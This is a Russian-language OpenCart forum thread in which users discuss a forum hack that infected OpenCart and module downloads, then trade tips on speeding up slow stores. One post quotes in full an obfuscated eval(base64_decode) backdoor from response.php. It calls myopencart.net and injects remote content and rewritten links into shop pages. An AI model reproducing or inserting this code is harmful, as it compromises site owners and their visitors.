Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Recommended Posts

Это топовое сообщество, где стоящий контент скрыт хайдом. Тут ссылка не ради рекламы уж точно (да и кто с ним не знаком). Вот, если б кто написал, что знает подобный ресурс с меньшим хайдом или его отсутствием - вот за это уже можно драть во все вентиляционные отверстия )))

Лучше бы связались с администрацией для выявления того самого "упырька". Запросить IP с которых заходил под тем ником у них и сравнить с данными по опенкартфоруму.

Надіслати
Поділитися на інших сайтах


baxabit сказал(а) 31 Май 2013 - 09:25:

Тут ссылка не ради рекламы уж точно (да и кто с ним не знаком).

Вы прикидываетесь или действительно не понимаете ценности внешних ссылок для ранжирования результатов в гугле/яндексе и т.п.?

К слову - я был не знаком до недавного времени. Само понятие "nulled" оказалось незнакомым.

baxabit сказал(а) 31 Май 2013 - 09:25:

Лучше бы связались с администрацией для выявления того самого "упырька". Запросить IP с которых заходил под тем ником у них и сравнить с данными по опенкартфоруму.

Вот именно. Займитесь. Помогите. Нефиг делегировать кому-то непонятному в воздух, считая свою миссию выполненной.
Надіслати
Поділитися на інших сайтах


baxabit сказал(а) 31 Май 2013 - 09:25:

Лучше бы связались с администрацией для выявления того самого "упырька". Запросить IP с которых заходил под тем ником у них и сравнить с данными по опенкартфоруму.

Вот именно. Займитесь. Помогите. Нефиг делегировать кому-то непонятному в воздух, считая свою миссию выполненной.
омг.. а сами Вы чем отличились? Т.е. советуете мне лично смело представиться в том сообществе от лица всего опенкартфорума, с целью выявления злоумышленника, который нагадил ещё 2 месяца тому назад? Давайте все дружно либо отмалчиваться, либо цитировать идеи и вставлять своё "фи"? Типо - "Вот Вам делать нечего, сами этим и займитель, нехрен делегировать. А я так.. мимо проходил".

Меня удивляет спокойствие администрации по этому поводу. Ресурс был взломан. Об этом вообще сообщалось? Тут не сообщество школьников, ищущих "нулячие" шаблоны для своего игрового портала и получающие в ответ заслуженные бекдоры, а либо владельцы ИМ, либо ими нанятые разработчики. Судя по подобным темам о зависаниях сайта, точнее по содержанию, где обсуждалось что угодно (например, модуль, имеющий 1300 запросов к БД, хостинги), но никак не проблему, с которой уже столкнулись и которую уже устраняли, можно сделать вывод об отсутствии информации по данному поводу у всех тех, кто вызвался помочь. Люди тратили нервы, время и деньги, а Вы лично предъявляете, мол, "миссия выполнена, плач услышан, с проблемой разобрались, теперь и ты пойди-ка помоги".

PS: По поводу внешних ссылок - если это строго нарушает правила форума, то вполне логично, что так и нужно заявлять нарушителю, а не советы один за другим "не лучшая идея, не советую, я б не рекомендовал, мне кажется не стоит". Если покопать форум, их тут можно откопать прилично. Этим заняться тоже мне прикажете? Или на то есть модераторы?

Надіслати
Поділитися на інших сайтах


омг.. а сами Вы чем отличились? Т.е. советуете мне лично смело представиться в том сообществе от лица всего опенкартфорума, с целью выявления злоумышленника, который нагадил ещё 2 месяца тому назад? Давайте все дружно либо отмалчиваться, либо цитировать идеи и вставлять своё "фи"? Типо - "Вот Вам делать нечего, сами этим и займитель, нехрен делегировать. А я так.. мимо проходил".

администрация форума никогда и ни при каких условиях не будет сотрудничать с этим сбродом

PS: По поводу внешних ссылок - если это строго нарушает правила форума, то вполне логично, что так и нужно заявлять нарушителю, а не советы один за другим "не лучшая идея, не советую, я б не рекомендовал, мне кажется не стоит". Если покопать форум, их тут можно откопать прилично. Этим заняться тоже мне прикажете? Или на то есть модераторы?

хоть одну найдите прежде чем такое печатать

Меня удивляет спокойствие администрации по этому поводу. Ресурс был взломан. Об этом вообще сообщалось? Тут не сообщество школьников, ищущих "нулячие" шаблоны для своего игрового портала и получающие в ответ заслуженные бекдоры, а либо владельцы ИМ, либо ими нанятые разработчики. Судя по подобным темам о зависаниях сайта, точнее по содержанию, где обсуждалось что угодно (например, модуль, имеющий 1300 запросов к БД, хостинги), но никак не проблему, с которой уже столкнулись и которую уже устраняли, можно сделать вывод об отсутствии информации по данному поводу у всех тех, кто вызвался помочь. Люди тратили нервы, время и деньги, а Вы лично предъявляете, мол, "миссия выполнена, плач услышан, с проблемой разобрались, теперь и ты пойди-ка помоги".

ресурс не был взломан, злоумышленнику удалось заразить файл simple.
Надіслати
Поділитися на інших сайтах

ресурс не был взломан, злоумышленнику удалось заразить файл simple.

но заразили то его на сайте (и не только его, как выясняется), уж никак не у меня

  • +1 1
Надіслати
Поділитися на інших сайтах

PS: По поводу внешних ссылок - если это строго нарушает правила форума, то вполне логично, что так и нужно заявлять нарушителю, а не советы один за другим "не лучшая идея, не советую, я б не рекомендовал, мне кажется не стоит". Если покопать форум, их тут можно откопать прилично. Этим заняться тоже мне прикажете? Или на то есть модераторы?

хоть одну найдите прежде чем такое печатать
А публикация ссылок на "свои" магазины со всевозможный завуалированием под тему? На подобии "а в моём магазине лучшая-мебель.ком 300-500 уников в сутки и я доволен". Для кого ценнее внешняя ссылка: для нового домена, проходящего индексацию, имеющего от силы десяток внешних ссылок, или для портала, превосходящего по трафику и по возрасту?

К тому же разумно выставить на публику нарушение, отметив конкретные нарушения правил. Мне вот обнулили репутацию, а в письме указана пустота в графе "причина". Без всяких предупреждений.

Надіслати
Поділитися на інших сайтах


вы не видите разницу между варезником и магазином на opencart ?

Вижу и я такой же противник подобных ресурсов. Но тем не менее, речь по само нарушение. Ведь если причиной является внешняя ссылка как таковая, можно было оставить текстовой вариант url, ведь сообщение было по теме, а автор в итоге представился яростным нарушителем.. К тому же она упоминается в другом сообщении. Давайте закроем этот вопрос. При всём уважении к Вам. Просто разочаровал тот факт, что на ссылку потратили внимание больше, чем на саму проблему.
Надіслати
Поділитися на інших сайтах


<оффтоп>Раз уж зашла тема про варезники, специально не поленился, нашел статью

 

http://habrahabr.ru/post/178339/

 

народ активно поддерживает варезники, пользуется, выкладывает туда модули, качает всякую фигню и находится один особо умный, который хочет продвинуть еще что-то свое каким-то жопным образом, а в итоге страдают все...

ладно бы еще цены на модули гнули, никто из российских авторов цены не заламывает, вроде все владельцы сайтов делают себе сайты для коммерции и получения прибыли, всякие вебстудии тоже не за бесплатно работают, больше, чем уверен, что за один вечер пятницы большинство на пиво/сигареты тратит больше. что в голове у людей - мне непонятно. такое чувство, что народ сам себя закатывает в грязь, настанет момент, когда наступит точка тотальной "пи...ы" во всех сферах... но это так - накипело. </оффтоп>

  • +1 4
Надіслати
Поділитися на інших сайтах

baxabit сказал(а) 31 Май 2013 - 10:37:

омг.. а сами Вы чем отличились? Т.е. советуете мне лично смело представиться в том сообществе от лица всего опенкартфорума, с целью выявления злоумышленника, который нагадил ещё 2 месяца тому назад?

То есть на мою просьбу помочь конкретным действием Вы повторно меня упрекаете, что я или кто-то ещё должен Вам по самые гланды?

Да, советую. Представьтесь собой, при чём тут лицо опенкартфорума. Или кем хотите. Королём ада, принцем Вселенной, человеком в погонах. Мне всё равно.

Я этим не занимаюсь по простой причине: считаю бесполезным. Если считаете, что это может помочь - пробуйте, действуйте.

baxabit сказал(а) 31 Май 2013 - 10:37:

Меня удивляет спокойствие администрации по этому поводу. Ресурс был взломан. Об этом вообще сообщалось?

Меня тоже. Вчера пол-дня челюсть с пола подбирал. Такие security alert-ы надо публиковать незамедлительно и как можно раньше.

baxabit сказал(а) 31 Май 2013 - 10:37:

Тут не сообщество школьников, ищущих "нулячие" шаблоны для своего [...], а либо владельцы ИМ, либо ими нанятые разработчики.

Да? А мне с точностью до наоборот казалось.

И если бы с "ищущими", "вскладчиками" и "робингудами" на форуме не стали бороться, Вам бы открылось много нового о владельцах и нанятых ими.

baxabit сказал(а) 31 Май 2013 - 10:37:

тратили нервы, время и деньги, а Вы лично предъявляете, мол, "миссия выполнена, плач услышан, с проблемой разобрались, теперь и ты пойди-ка помоги".

(устало) Мою цитату, пожалуйста, где я такое предлагаю.
Надіслати
Поділитися на інших сайтах


ресурс не был взломан, злоумышленнику удалось заразить файл simple.

 

А вот, каким образом он заразил, есть где-то информация? Дабы исключить это и у себя...

Надіслати
Поділитися на інших сайтах


ресурс не был взломан, злоумышленнику удалось заразить файл simple.

 

А вот, каким образом он заразил, есть где-то информация? Дабы исключить это и у себя...

читайте выше и внимательней

был взломан ЭТОТ форум и заражен архив опенкарта и архивы ряда модулей, включая мой

Надіслати
Поділитися на інших сайтах

  • 2 weeks later...

Привет всем. Решил остановиьтся на этом магазине, установил и та же проблема - долгая загрузка, хотя почти пустой магазин. Нашел файл response.php и снес, как советовали, переменную с этим кодом

$ouput = eval(base64_decode('ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0='));

Сайт перестал работать вообще. Что не так сделал?

Все, заменил файл на нормальный (нашел ответ в другой ветке и стал работать сайт на ура.

Надіслати
Поділитися на інших сайтах


  • 5 weeks later...

Help! У нас Опенкарт 1.5.5.1 очень тормозит на стороне сервера. Файлы на наличие ф*гни всякой проверили,  все норм.


 


Подскажите куда смотреть???


может возможно как то отследить битые запросы?? подозреваю дело в них может быть....


Может есть некий инструментарий для отслеживания "тормозов"???


 


В какую сторону копать??? 


Надіслати
Поділитися на інших сайтах


Help! У нас Опенкарт 1.5.5.1 очень тормозит на стороне сервера. Файлы на наличие ф*гни всякой проверили,  все норм.

 

Подскажите куда смотреть???

может возможно как то отследить битые запросы?? подозреваю дело в них может быть....

Может есть некий инструментарий для отслеживания "тормозов"???

 

В какую сторону копать??? 

Примерно также проблема. Уже не знаю что делать

Надіслати
Поділитися на інших сайтах


вряд ли у вас такая же проблема. я смотрел этот двиг, там до меня какой-то умник потрудился, кучу ошибок, которые вместе того что бы исправить он скрыл по хитрому и внешне сайт работает нормально ))

Надіслати
Поділитися на інших сайтах

Доброго времени суток Уважаемые!

Та же проблема магазин относительно не большой 500+ товаров, после обновления заметил тормоза, решил обычного хостинга мало, переехал на VDS но проблема с скоростью загрузки, откликом не решилась....иногда не доступен вообще!!!!

Прошу помощи в решении проблемы за вознаграждение $

Пациент: ВВВ....shop-service.com.uА

версия Version 1.5.4.1

связь skype: rusisha . icq 12O123 или ЛС

______________________________________________________________

Заранее благодарен без задней мысли!!!

Надіслати
Поділитися на інших сайтах


Доброго времени суток Уважаемые!

Та же проблема магазин относительно не большой 500+ товаров, после обновления заметил тормоза, решил обычного хостинга мало, переехал на VDS но проблема с скоростью загрузки, откликом не решилась....иногда не доступен вообще!!!!

Прошу помощи в решении проблемы за вознаграждение $

Пациент: ВВВ....shop-service.com.uА

версия Version 1.5.4.1

связь skype: rusisha . icq 12O123 или ЛС

______________________________________________________________

Заранее благодарен без задней мысли!!!

По рекомендациям было сделано ...

- отключить подсчет товаров в категории....сделал

- установить кеширующий seo_pro!!!....  нада смотреть, искать, качать...

- судя по логам тормозной фильтр лучше так же заменить...отключил

Надіслати
Поділитися на інших сайтах


В opencart тормозит из-за трех проблем - первая это база данных (нет индексов), вторая это внутренний кэш системы (ф-ция blob). Когда в папке кеша появляется много файлов кеша, то glob(DIR_CACHE . 'cache.*') очень сильно тормозит. Третья это ресайз картинок на лету.  Если очень много товаров и категорий это сразу сказывается на работе сайта. Вот мой пример сайта http://magazinknig.com в базе 150т. товаров, около 6 т. категорий. 

Надіслати
Поділитися на інших сайтах


В opencart тормозит из-за трех проблем - первая это база данных (нет индексов), вторая это внутренний кэш системы (ф-ция blob). Когда в папке кеша появляется много файлов кеша, то glob(DIR_CACHE . 'cache.*') очень сильно тормозит. Третья это ресайз картинок на лету.  Если очень много товаров и категорий это сразу сказывается на работе сайта. Вот мой пример сайта http://magazinknig.com в базе 150т. товаров, около 6 т. категорий. 

Если у вас там 150к товаров, то почему поиск по пробелу выдает меньше половины? Кстати, на выборку и загрузку страницы ушло секунд 14-15, не думали как-то оптимизировать процесс поиска?

И раз уж вы привели в пример свой сайт, то расскажите, что сделали для ускорения его работы (только индексы и оптимизация кеша?), где и на чем хоститесь и т.п.

Надіслати
Поділитися на інших сайтах

Если у вас там 150к товаров, то почему поиск по пробелу выдает меньше половины? Кстати, на выборку и загрузку страницы ушло секунд 14-15, не думали как-то оптимизировать процесс поиска?

И раз уж вы привели в пример свой сайт, то расскажите, что сделали для ускорения его работы (только индексы и оптимизация кеша?), где и на чем хоститесь и т.п.

Поиск не оптимизировал, в поиске показывает не все товары (да, часть товаров у меня оказалась не активна, а я даже не знал :) ), для того чтоб был нормальный поиск нужно ставить sphinx. Или использовать поиск от гугла.

 

По базе данных: `oc_category` индексы на поля "`parent_id` `status` `sort_order` `date_added``date_modified`"

`oc_product` => `manufacturer_id` `model` `stock_status_id` `quantity` `author_id` `sort_order` 

 

Для кэширования использую Cache_Lite и частично внутренний кэш. В основном кэширую функцию getCategories

Отказался от model_tool_image->resize для товаров.

Хостинг у nic.ua

Надіслати
Поділитися на інших сайтах


Таки я ввел в заблуждение не 150т. товаров, извините, почти 73т. категорий 2700 - это реально сайчас. Товаров 150т.+6т категорий, это я генерировал для проверки и естественно на сайте сейчас таких цифр нет.

 

Спасибо за хак с пробелом, пофиксил, потому как like c пробелом перебирать все товары это зло.

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.